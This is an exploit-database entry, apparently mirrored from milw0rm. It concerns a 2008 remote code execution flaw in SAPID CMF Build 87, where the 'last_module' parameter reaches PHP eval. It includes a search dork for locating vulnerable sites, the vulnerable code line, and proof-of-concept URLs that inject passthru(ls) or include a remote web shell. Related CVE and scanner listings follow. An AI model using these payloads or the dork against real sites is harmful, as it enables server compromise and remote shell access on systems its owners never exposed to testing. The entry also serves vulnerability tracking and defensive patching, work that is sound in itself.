Lucene search
GoLd_MEDB-ID:5097HistoryFeb 10, 2008 - 12:00 a.m.
SAPID CMF Build 87 - 'last_module' Remote Code Execution
2008-02-1000:00:00
GoLd_M
www.exploit-db.com
70
AI Score
7.4
Confidence
Low
### SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability
### Script R84 : http://puzzle.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.r84.zip
### Script Update R87 :http://surfnet.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.update.r84-r87.zip
### Dork : Powered by SAPID CMF Build 87
### Vuln :
### 09: */
eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
### POC :
### /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//
### OR INCLUDE SHELL
### /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);//
### I'm TrYaGi ......:)
# milw0rm.com [2008-02-10]Related
exploitdb
exploitdb
PacerCMS 0.6 - 'last_module' Remote Code Execution
2008-02-10 00:00:00
Journalness 4.1 - 'last_module' Remote Code Execution
2008-02-09 00:00:00
CMS Made Simple 1.2 - Remote Code Execution
2007-09-21 00:00:00
cve
cve
CVE-2007-5056
2007-09-24 22:17:00
canvas
canvas
Immunity Canvas: OPENREALTY_EXEC
2007-09-24 22:17:00
Immunity Canvas: CMSMADESIMPLE_EVAL
2007-09-24 18:17:00
Immunity Canvas: PACERCMS_EXEC
2007-09-24 22:17:00
cvelist
cvelist
CVE-2007-5056
2007-09-24 22:00:00
prion
prion
Design/Logic Flaw
2007-09-24 22:17:00
nessus
nessus
nvd
nvd
CVE-2007-5056
2007-09-24 22:17:00